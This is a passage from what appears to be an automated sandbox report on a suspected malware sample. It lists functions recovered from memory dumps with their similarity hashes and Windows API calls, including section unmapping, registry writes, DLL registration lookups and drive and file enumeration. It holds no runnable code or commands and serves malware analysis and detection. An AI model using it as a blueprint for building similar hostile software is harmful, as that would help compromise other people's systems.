    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32B25, Relevance: 10.6, APIs: 7, Instructions: 98 Total matches: 51file
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
